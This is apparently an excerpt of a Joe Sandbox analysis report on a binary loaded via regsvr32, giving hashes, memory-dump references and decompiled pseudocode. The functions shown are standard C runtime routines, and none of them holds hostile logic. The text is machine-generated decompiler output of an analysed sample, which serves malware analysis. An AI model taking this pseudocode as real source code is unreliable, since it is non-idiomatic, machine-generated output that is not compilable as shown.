                                • Opcode Fuzzy Hash: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                • Instruction Fuzzy Hash: 62010831E0C646DAF7A09B68EC057AD66D0B380354FB04625A69C066F9DB7EE589CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                • API String ID: 2123368286-563024394
                                • Opcode ID: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                • Instruction ID: a0eba8665c26eae2e6ed32b737e6c8ef722208237a38dcf7c055842964877d15
                                • Opcode Fuzzy Hash: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                • Instruction Fuzzy Hash: 5B01483190860A86FBA09B14EC417AE62E0F351328FB14222D2DC126E4DB7FE545CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                • API String ID: 2123368286-577066449
                                • Opcode ID: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                • Instruction ID: 4a3f651cd4551bfcababacb72a39fd99133eb44e8e6a79d9543262d1bb372964
                                • Opcode Fuzzy Hash: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                • Instruction Fuzzy Hash: 5D019630E0860ACAE7A09B10EC817AD22E0E794394FA08025A2CD066F8DB3EE6448B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 1646373207-1276376045
                                • Opcode ID: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                • Instruction ID: 8122274e17013f5b0610865d0345eaa92fe91d894f768ab51d4a4384d1174919
                                • Opcode Fuzzy Hash: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                • Instruction Fuzzy Hash: A5F0AC31918A4282D674DF18F94836DB7B0F384348F644125E6CE42678DF3ED559CA04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                				signed long long _v16;
                                				long _v24;
                                				void* _t57;
                                				signed long long _t59;
                                
                                				_t57 = __rax;
                                				_a8 = __ecx;
                                				E000007FE7FEF9D3F900(_a8);
                                				if (_t57 == 0xffffffff) goto 0xf9d40d05;
                                				if (_a8 != 1) goto 0xf9d40cb3;
                                				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
                                				if (_a8 != 2) goto 0xf9d40cef;
                                				_t59 =  *0xf9d4e560;
                                				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
                                				E000007FE7FEF9D3F900(1);
                                				_v16 = _t59;
                                				E000007FE7FEF9D3F900(2);
                                				if (_v16 == _t59) goto 0xf9d40d05;
                                				E000007FE7FEF9D3F900(_a8);
                                				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
                                				_v24 = 0;
                                				goto 0xf9d40d19;
                                				_v24 = GetLastError();
                                				E000007FE7FEF9D3F7D0(_a8, _t59);
                                				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                				if (_v24 == 0) goto 0xf9d40d60;
                                				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
                                				goto 0xf9d40d62;
                                				return 0;
                                			}








                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                • String ID:
                                • API String ID: 1551955814-0
                                • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: FormatLocaleThread$DateTime
                                • String ID:
                                • API String ID: 3587784874-0
                                • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 23%
                                			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
                                				signed int _v24;
                                				char _v42;
                                				void* _v48;
                                				signed int _v56;
                                				char _v312;
                                				signed char* _v328;
                                				char _v584;
                                				char _v840;
                                				char _v1352;
                                				char _v1384;
                                				char _v1392;
                                				intOrPtr _v1400;
                                				long long _v1408;
                                				long long _v1416;
                                				signed long long _t206;
                                				signed char* _t214;
                                				signed long long _t223;
                                				intOrPtr _t225;
                                				intOrPtr _t226;
                                				signed long long _t233;
                                
                                				_t224 = __rcx;
                                				_a8 = __rcx;
                                				_t206 =  *0xf9d4b018; // 0x6ebd4e3f5ce4
                                				_v24 = _t206 ^ _t233;
                                				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
                                				_v56 = 0;
                                				goto 0xf9d2a63c;
                                				_v56 = _v56 + 1;
                                				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
                                				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                				goto 0xf9d2a62c;
                                				_v312 = 0x20;
                                				_v328 =  &_v42;
                                				goto 0xf9d2a68f;
                                				_v328 =  &(_v328[2]);
                                				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
                                				_v56 =  *_v328 & 0x000000ff;
                                				goto 0xf9d2a6c2;
                                				_v56 = _v56 + 1;
                                				_t214 = _v328;
                                				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
                                				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                				goto 0xf9d2a6b2;
                                				goto 0xf9d2a67b;
                                				_v1392 = 0;
                                				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                				_v1416 =  &_v1352;
                                				r9d = 0x100;
                                				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
                                				_v1384 = 0;
                                				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                				_v1400 = 0x100;
                                				_v1408 =  &_v840;
                                				_v1416 = 0x100;
                                				r8d = 0x100;
                                				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                				_v1384 = 0;
                                				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                				_v1400 = 0x100;
                                				_v1408 =  &_v584;
                                				_v1416 = 0x100;
                                				r8d = 0x200;
                                				_t223 = _a8;
                                				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                				_v56 = 0;
                                				_v56 = _v56 + 1;
                                				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
                                				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
                                				_t225 = _a8;
                                				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                				goto 0xf9d2a8fc;
                                				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
                                				_t226 = _a8;
                                				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
                                				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                				goto 0xf9d2a8fc;
                                				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                				goto L1;
                                				goto 0xf9d2aa20;
                                				_v56 = 0;
                                				_v56 = _v56 + 1;
                                				_v56 = _v56 + 1;
                                				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
                                				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
                                				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
                                				_v56 = _v56 + 1;
                                				__rcx = _a8;
                                				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
                                				_v56 = _v56 + 1;
                                				__rdx = _a8;
                                				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                				_v56 = _v56 + 0x20;
                                				__ecx = _v56;
                                				__rdx = _a8;
                                				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                				goto 0xf9d2aa1b;
                                				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
                                				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
                                				_v56 = _v56 + 1;
                                				__rcx = _a8;
                                				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                				_v56 = _v56 + 1;
                                				__rdx = _a8;
                                				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                				_v56 = _v56 - 0x20;
                                				__ecx = _v56;
                                				__rdx = _a8;
                                				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                				goto 0xf9d2aa1b;
                                				__eax = _v56;
                                				__rcx = _a8;
                                				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                				goto L2;
                                				__rcx = _v24;
                                				__rcx = _v24 ^ __rsp;
                                				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Info
                                • String ID: $z
                                • API String ID: 1807457897-2251613814
                                • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 35%
                                			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                				long long _v24;
                                				long long _v32;
                                				long long _v40;
                                				long long _v48;
                                				long long _v56;
                                				char _v60;
                                				char _v64;
                                				signed int _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v96;
                                				intOrPtr _v104;
                                				long long _v112;
                                				long long _v120;
                                				long long _v128;
                                				signed int _v136;
                                				void* _t106;
                                				void* _t117;
                                				void* _t118;
                                				void* _t119;
                                				void* _t120;
                                				void* _t121;
                                				long long _t153;
                                				signed int _t161;
                                				signed int _t165;
                                				long long _t166;
                                				long long _t169;
                                				long long _t170;
                                				intOrPtr _t174;
                                
                                				_a32 = __r9;
                                				_a24 = __r8;
                                				_a16 = __rdx;
                                				_a8 = __rcx;
                                				_t153 = _a8;
                                				if ( *_t153 != 0x80000003) goto 0xf9d34990;
                                				goto 0xf9d34cc6;
                                				0xf9d24000();
                                				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
                                				0xf9d24000();
                                				_v56 = _t153;
                                				E000007FE7FEF9D23D00(_t106);
                                				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
                                				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
                                				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
                                				_v120 = _a64;
                                				_v128 = _a56;
                                				_v136 = _a40;
                                				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
                                				goto 0xf9d34cc6;
                                				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
                                				goto 0xf9d34a48;
                                				E000007FE7FEF9D2CF80(_a40);
                                				_v120 = _a32;
                                				_v128 =  &_v60;
                                				_t161 =  &_v64;
                                				_v136 = _t161;
                                				r9d = _a48;
                                				r8d = _a56;
                                				E000007FE7FEF9D2EA30(_a16, _a40);
                                				_v72 = _t161;
                                				_v64 = _v64 + 1;
                                				_v72 = _v72 + 0x14;
                                				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
                                				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
                                				_t165 = _v72;
                                				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
                                				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
                                				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
                                				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
                                				_v48 = _t166;
                                				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
                                				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                				_v40 = _t169;
                                				goto 0xf9d34b5f;
                                				_v40 = 0;
                                				if (_v40 == 0) goto 0xf9d34bff;
                                				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
                                				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
                                				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
                                				_v32 = _t170;
                                				E000007FE7FEF9D2E680(_t121, _t170);
                                				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                				goto 0xf9d34bef;
                                				_v24 = 0;
                                				_t174 = _v24;
                                				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
                                				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
                                				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
                                				goto L1;
                                				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                				__eflags = __rax;
                                				_v80 = 0;
                                				_v88 = 1;
                                				__rcx = _a64;
                                				_v96 = _a64;
                                				_v104 = _a56;
                                				__rcx = _v72;
                                				_v112 = _v72;
                                				_v120 = 0;
                                				_v128 = __rax;
                                				__rax = _a40;
                                				_v136 = _a40;
                                				__r9 = _a32;
                                				__r8 = _a24;
                                				__rdx = _a16;
                                				__rcx = _a8;
                                				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                				goto L1;
                                				return __eax;
                                			}

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: MOC$RCC
                                • API String ID: 0-2084237596
                                • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 19%
                                			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                				signed int _t217;
                                				signed char _t222;
                                				intOrPtr _t257;
                                				signed int _t332;
                                				signed int _t333;
                                				signed long long _t336;
                                				intOrPtr* _t359;
                                				signed long long _t384;
                                
                                				_t332 = __rax;
                                				_a116 = 0x10;
                                				asm("bts eax, 0xf");
                                				_a708 = 7;
                                				_a708 = 0x27;
                                				_a72 = 0x10;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                				_a84 = 0x30;
                                				_a85 = _a708 + 0x51;
                                				_a92 = 2;
                                				_a72 = 8;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                				asm("bts eax, 0x9");
                                				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                				E000007FE7FEF9D31EA0( &_a1112);
                                				_a824 = _t332;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                				E000007FE7FEF9D31EA0( &_a1112);
                                				_a824 = _t332;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                				_t333 = E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t333;
                                				goto 0xf9d3c80e;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t333;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t333;
                                				goto 0xf9d3c84b;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t333;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                				if (_a824 >= 0) goto 0xf9d3c882;
                                				_a832 =  ~_a824;
                                				asm("bts eax, 0x8");
                                				goto 0xf9d3c892;
                                				_t336 = _a824;
                                				_a832 = _t336;
                                				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                				_a832 = _a832 & _t336;
                                				if (_a116 >= 0) goto 0xf9d3c8d8;
                                				_a116 = 1;
                                				goto 0xf9d3c8f5;
                                				_a80 = _a80 & 0xfffffff7;
                                				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                				_a116 = 0x200;
                                				if (_a832 != 0) goto 0xf9d3c908;
                                				_a92 = 0;
                                				_a64 =  &_a687;
                                				_t217 = _a116;
                                				_a116 = _a116 - 1;
                                				if (_t217 > 0) goto 0xf9d3c936;
                                				if (_a832 == 0) goto 0xf9d3c9d3;
                                				_a1040 = _a72;
                                				_a816 = _t217 / _a1040 + 0x30;
                                				_a1048 = _a72;
                                				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                				_t222 = _a816 + _a708;
                                				_a816 = _t222;
                                				 *_a64 = _a816 & 0x000000ff;
                                				_a64 = _a64 - 1;
                                				goto 0xf9d3c915;
                                				_a104 = _t222;
                                				_a64 = _a64 + 1;
                                				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                				if (_a104 == 0) goto 0xf9d3ca12;
                                				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                				_a64 = _a64 - 1;
                                				 *_a64 = 0x30;
                                				_a104 = _a104 + 1;
                                				if (_a108 != 0) goto 0xf9d3cc6e;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                				_a84 = 0x2d;
                                				_a92 = 1;
                                				goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                				_a84 = 0x2b;
                                				_a92 = 1;
                                				goto 0xf9d3ca95;
                                				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                				_a84 = 0x20;
                                				_a92 = 1;
                                				_a840 = _a88 - _a104 - _a92;
                                				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                				if (_a76 == 0) goto 0xf9d3cc1d;
                                				if (_a104 <= 0) goto 0xf9d3cc1d;
                                				_a872 = 0;
                                				_a848 = _a64;
                                				_a856 = _a104;
                                				_a856 = _a856 - 1;
                                				if (_a856 == 0) goto 0xf9d3cc1b;
                                				_a1056 =  *_a848 & 0x0000ffff;
                                				r9d = _a1056 & 0x0000ffff;
                                				r8d = 6;
                                				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                				_a848 =  &(_a848[1]);
                                				if (_a872 != 0) goto 0xf9d3cbe5;
                                				if (_a860 != 0) goto 0xf9d3cbf2;
                                				_a688 = 0xffffffff;
                                				goto 0xf9d3cc1b;
                                				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                				goto 0xf9d3cb60;
                                				goto 0xf9d3cc3b;
                                				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                				if (_a688 < 0) goto 0xf9d3cc6e;
                                				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                				if (_a96 == 0) goto 0xf9d3cc8e;
                                				0xf9d25330();
                                				_a96 = 0;
                                				goto 0xf9d3b99c;
                                				if (_a704 == 0) goto 0xf9d3ccb4;
                                				if (_a704 == 7) goto 0xf9d3ccb4;
                                				_a1060 = 0;
                                				goto 0xf9d3ccbf;
                                				_a1060 = 1;
                                				_t257 = _a1060;
                                				_a876 = _t257;
                                				if (_a876 != 0) goto 0xf9d3cd05;
                                				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                				_a32 = _t359;
                                				r9d = 0;
                                				r8d = 0x8f5;
                                				0xf9d2b3b0();
                                				if (_t257 != 1) goto 0xf9d3cd05;
                                				asm("int3");
                                				if (_a876 != 0) goto 0xf9d3cd61;
                                				0xf9d2ab30();
                                				 *_t359 = 0x16;
                                				_a32 = 0;
                                				r9d = 0x8f5;
                                				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                				_a912 = 0xffffffff;
                                				E000007FE7FEF9D26800( &_a120);
                                				goto 0xf9d3cd80;
                                				_a916 = _a688;
                                				E000007FE7FEF9D26800( &_a120);
                                				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                			}












                                APIs
                                Strings
                                Memory Dump Source
